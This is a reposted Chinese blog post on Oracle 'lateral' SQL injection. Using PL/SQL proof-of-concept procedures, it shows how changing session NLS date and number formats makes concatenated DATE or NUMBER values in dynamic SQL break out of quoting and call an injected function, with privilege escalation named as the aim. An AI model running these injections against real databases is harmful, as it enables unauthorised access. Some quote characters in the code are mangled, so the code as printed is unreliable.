欢迎您访问程序员文章站本站旨在为大家提供分享程序员计算机编程知识!
您现在的位置是: 首页  >  IT编程

ORACLE LATERAL-SQL-INJECTION 个人见解

程序员文章站 2023-12-03 12:38:28
如果直接执行sql语句或者参数绑定则不用担心太多, 如以下oracle存储过程 create or replace procedure&nbs...
如果直接执行sql语句或者参数绑定则不用担心太多,
如以下oracle存储过程
create or replace procedure kjdatepoc(date d)

as

begin

insert into kjdatetable values(d);

commit;

end;

根本不需要担心遭受到sql新型注入攻击,那么在什么地方会发生date 以及 number的注入攻击呢!?一般都是采用了动态sql而又不采用参数绑定的语句。

例如工程师经常用的dbms_sql或者execute immediate

看以下存储过程

create or replace procedure kjdatepoc(date d)

as

begin

execute immediate ‘insert into kjdatetable values('|| d ||')';

commit;

end;

那么遇到以上的存储过程或者函数等,也通过修改session中的nls_date_format中的值达到sql注射的目的,

老外的paper讲解得非常详细了 ,我在这里也不废话。

惟独对于 number类型的注射没有多作讲解 只是简单演示了可以输出单引号!

看以下语句

alter session set nls_numeric_characters=”'.';

select to_number(1000.10001,'999999d99999′)||” from dual;

输出一下结果

1000′10001

只是多了一个单引号,那有什么用呢?乐观的来说!在特定情况下是很有价值的!看以下一个存储过程

create or replace procedure numinjpoc(kjexpnum number,kjexpstr varchar2)

is

secstr varchar2(1000);

begin

secstr:=replace(kjexpstr,””,”””);

sys.dbms_output.put_line('select * from dual where id='||kjexpnum||' and name=”'||secstr||””);

end;

内部对varchar类型进行替换了!我们可以进行测试

begin

numinjpoc(1000,”'–');

end;

其输出sql语句为

select * from dual where id=1000 and name=”'–'

单引号被转义掉了

那么如果我们结合这个number类型怎么进行注射呢?

alter session set nls_numeric_characters=”'.';

begin

numinjpoc(to_number(0.10001,'999999d99999′),'||kj.exp()–');

end;

看看输出结果

select * from dual where id='10001 and name='||kj.exp()–'

这样就可以间接的攻击它…

在某中程度才来需要alter session 配合后,再去攻击系统内部的一些函数或者过程来提升权限。未尝不是一种好的突破思路,但是对于单语句进行sql注射攻击,以结果为向导的话!这样的方式没多大作为。